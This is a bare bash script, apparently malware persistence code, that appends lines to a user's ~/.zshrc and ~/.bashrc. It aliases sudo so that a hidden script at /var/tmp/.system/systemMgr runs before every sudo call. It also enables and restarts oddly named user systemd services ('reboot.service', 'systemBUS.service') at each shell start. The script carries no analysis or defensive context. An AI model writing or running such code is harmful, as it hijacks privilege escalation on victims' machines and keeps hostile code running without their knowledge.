#!/bin/bash ls -a ~/ | grep 'zshrc' &> /dev/null if [ $? = 0 ]; then echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc fi ls -a ~/ | grep 'bashrc' &> /dev/null if [ $? = 0 ]; then echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc fi